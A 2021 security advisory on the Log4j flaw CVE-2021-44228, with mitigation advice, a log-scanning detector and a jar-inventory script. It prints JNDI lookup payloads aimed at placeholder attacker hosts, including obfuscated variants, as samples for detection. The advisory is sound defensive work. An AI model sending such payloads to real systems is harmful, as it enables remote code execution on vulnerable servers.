December 11, 2021

Critical security advisory - Log4j vulnerability

By

Theta

We would like to draw your attention to a new and serious cyber security risk that has already impacted many companies.

This issue affects Java applications and services that log with the Log4j 2 library. Internet-facing Java web servers are the most exposed, but any Java component that logs attacker-supplied data is at risk, and successful exploitation lets an attacker run code on, and take control of, the server.

This issue is so serious, and attackers are exploiting it so quickly, that we are informing all companies we deal with, so you can act quickly to put mitigations in place with urgency.

Active exploitation is underway, as confirmed by CERT NZ, and industry peers are observing attacks in the region.

About This Issue

The vulnerability is in Log4j 2, a widely used Java logging library from the Apache Software Foundation that is embedded in enterprise applications and cloud services across the globe.

The SANS ISC (Internet Storm Center), which tracks global threats to internet stability, raised its threat level to Yellow this morning. This has not happened since 2017, when the WannaCry ransomware was running rampant, and is something to be taken seriously.

This is being tracked as CVE-2021-44228. Log4j 2 versions 2.0-beta9 through 2.14.1 are affected (Log4j 1.x does not have the lookup feature involved and is not affected by this CVE), and the issue is reachable in the default configuration of multiple Apache projects, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.

Proof-of-concept exploits targeting specific systems and services were shared overnight, and hundreds of hosts worldwide have already been identified mass-scanning for and exploiting this vulnerability.

The exploit is easy to execute: it only requires that a particular attacker-controlled string be logged by the application. Log4j 2 expands ${...} lookups inside log messages, and a ${jndi:...} lookup makes the Java process connect to a server named in the string and act on what it returns. We have observed attacks that place the payload in the browser's User-Agent header, for example ${jndi:ldap://attacker.com/a}, where attacker.com is a server the attacker controls; its response can direct the Java process to fetch and execute attacker-supplied code. Any other logged input works the same way, including URL parameters, form fields, usernames and headers such as X-Forwarded-For. Attackers are also obfuscating the string (for example nesting ${lower:j} inside it) to slip past naive filters.

Cloudflare has published the exploitation payloads it has captured in the wild - https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/.
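To illustrate the logging-based trigger described above, here is a small detection script that scans web server access-log lines for the ${jndi:...} lookup, after undoing the common obfuscations (nested ${lower:...}, ${upper:...}, ${::-x} default-value tricks and URL-encoding). This is an added example written for this advisory, not code from Cloudflare, Theta or the Log4j project; the log lines are constructed samples and attacker.example is a placeholder host.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not real captures).
# Lines 1, 2 and 4 carry lookup payloads in the User-Agent or query string;
# line 3 is a normal browser request.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:15:44 +0000] "GET /login HTTP/1.1" 200 812 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '198.51.100.2 - - [10/Dec/2021:22:16:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Dec/2021:22:17:30 +0000] "GET /?q=%24%7Bjndi%3A%24%7B%3A%3A-r%7D'
    'mi%3A%2F%2Fattacker.example%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")                 # innermost ${...}, no nested braces
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve_one(m):
    """Evaluate one innermost lookup the way Log4j would, or leave it alone."""
    body = m.group(1)
    key, sep, rest = body.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return m.group(0)               # the payload itself: keep it so it can be matched
    if key == "lower" and sep:
        return rest.lower()             # ${lower:J} -> j
    if key == "upper" and sep:
        return rest.upper()             # ${upper:j} -> J
    if ":-" in body:
        return body.rsplit(":-", 1)[1]  # ${env:UNSET:-j} or ${::-j} -> the default value j
    return m.group(0)                   # date:, sys:, ...: nothing to undo offline


def normalize_lookups(text, max_rounds=25):
    """URL-decode, then collapse nested obfuscation from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        expanded = LOOKUP_RE.sub(_resolve_one, text)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi_payloads(line):
    """Return the de-obfuscated ${jndi:...} lookups found in one log line."""
    return JNDI_RE.findall(normalize_lookups(line))


def scan_lines(lines):
    """Map 1-based line number -> payloads, for the lines that contain any."""
    hits = {}
    for n, line in enumerate(lines, 1):
        payloads = find_jndi_payloads(line)
        if payloads:
            hits[n] = payloads
    return hits


if __name__ == "__main__":
    for n, payloads in scan_lines(SAMPLE_LOG_LINES).items():
        print(f"line {n}: {payloads}")
```

Run it over real access, proxy or WAF logs by feeding the file's lines to scan_lines. It is a detector, not a full re-implementation of Log4j's lookup parser, so treat a hit as a reason to look at the host rather than as proof of compromise, and remember that a payload logged by a non-Java front end may still have reached a Java service behind it.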

What systems could be impacted

A very large number of products and systems embed Log4j. It is not always obvious which systems run Java, or which Java systems bundle log4j-core inside their own packaging (fat jars, WAR and EAR files, vendor appliances), so check your inventory rather than relying on memory: look for log4j-core on disk, including inside application archives, and ask your vendors for advisories.

Here is a list of software and services reported as affected (this is being updated as we learn more). Note that it mixes products that bundle Log4j with companies whose online services responded to proof-of-concept payloads, so confirm against each vendor's own advisory before acting on it.

Splunk, AWS Lambda, Apple iOS/iPadOS/macOS, Confluence, Jira, Jenkins, Discord, Webex, Amazon, Tesla, Kafka, Steam, Twitter, among many others, have been reported as exploitable.

What to do about it

Cloudflare's mitigation advice is here - https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

The short version: upgrade log4j-core to a fixed release as soon as you can, on every system where your inventory finds it. For jars you cannot upgrade immediately, the Apache project's fallback is to remove the JndiLookup class from the log4j-core jar. The log4j2.formatMsgNoLookups=true setting (Log4j 2.10 and later) is also widely circulated; treat it as a stop-gap that narrows exposure rather than a complete fix.

Consider removing all access from the internet to the impacted servers in the interim, and block outbound LDAP, RMI and other non-essential egress from servers, since the exploit needs the server to call back to the attacker.
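The inventory check and the fallback mitigation above can both be scripted. The following is an added example written for this advisory, not Theta's, Cloudflare's or the Log4j project's own tooling: it walks a directory tree, finds log4j-core (including copies nested inside fat jars, WARs and EARs), reads the version from the Maven metadata, flags the range affected by CVE-2021-44228, and can rewrite a top-level jar without JndiLookup.class, which is the Apache project's documented fallback for versions that cannot be upgraded yet. The demo() function builds constructed stand-in jars (no real bytecode) in a temporary directory so the script can run offline; the file names under it are assumptions for the demo.

```python
import io
import os
import re
import sys
import tempfile
import zipfile

# Entries that identify a log4j-core jar and the class behind the JNDI lookup.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")

def affected_by_cve_2021_44228(version):
    """True for Log4j 2 before 2.15.0 (2.0-beta9 .. 2.14.1), False for 2.15.0+ and
    for Log4j 1.x, None if unparseable. This CVE only: later advisories added fixes."""
    m = re.match(r"(\d+)\.(\d+)", version or "")
    if not m:
        return None
    return int(m.group(1)) == 2 and int(m.group(2)) < 15

def _inspect_zip(zf, label, findings):
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:  # Maven metadata carries the exact log4j-core version
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_class = JNDI_LOOKUP_CLASS in names
    if has_class or version is not None:
        findings.append({"archive": label, "log4j_core_version": version,
                         "jndi_lookup_present": has_class,
                         "affected": affected_by_cve_2021_44228(version)})
    for name in names:  # fat jars and WAR/EAR bundles nest log4j-core inside
        if name.lower().endswith(ARCHIVES):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                _inspect_zip(inner, label + "!" + name, findings)

def scan_archive(path):
    findings = []
    with zipfile.ZipFile(path) as zf:
        _inspect_zip(zf, path, findings)
    return findings

def scan_tree(root):
    """Walk a directory and report every log4j-core found, nested or not."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVES):
                try:
                    findings.extend(scan_archive(os.path.join(dirpath, fn)))
                except zipfile.BadZipFile:
                    pass  # not really a zip archive; skip it
    return findings

def strip_jndi_lookup(jar_path):
    """Rewrite a top-level jar without JndiLookup.class (Apache's fallback for jars
    that cannot be upgraded yet). A copy nested inside a fat jar must be repacked
    by hand. Returns True if the class was removed."""
    tmp = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    if removed:
        os.replace(tmp, jar_path)
    else:
        os.remove(tmp)
    return removed

def build_sample_jar(path, version=None, with_class=False, nested=None):
    """Constructed stand-in for a jar (demo only: no real bytecode inside)."""
    with zipfile.ZipFile(path, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        if with_class:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        if nested:
            zf.write(nested, os.path.basename(nested))

def demo():
    """Build sample archives in a temp dir, scan them, strip the old jar, rescan it."""
    with tempfile.TemporaryDirectory() as root:
        old = os.path.join(root, "log4j-core-2.14.1.jar")   # assumed file names
        new = os.path.join(root, "log4j-core-2.17.0.jar")
        build_sample_jar(old, "2.14.1", with_class=True)
        build_sample_jar(new, "2.17.0", with_class=True)  # fixed releases keep the class, locked down
        build_sample_jar(os.path.join(root, "app-all.jar"), nested=old)
        before = scan_tree(root)
        removed = strip_jndi_lookup(old)
        return {"before": before, "removed": removed, "after": scan_archive(old)}

if __name__ == "__main__":
    print(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

Point it at an application root (python3 scan_log4j.py /opt/app) and act on every finding whose "affected" is True or whose version is None. Two cautions: the version, not the presence of JndiLookup.class, decides whether a jar is in the affected range, since fixed releases still ship the class in restricted form; and stripping the class does not change the recorded version, so a stripped jar will keep showing as affected and you need to track the mitigation separately until the jar is actually upgraded.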

If you have questions about this, please reach out.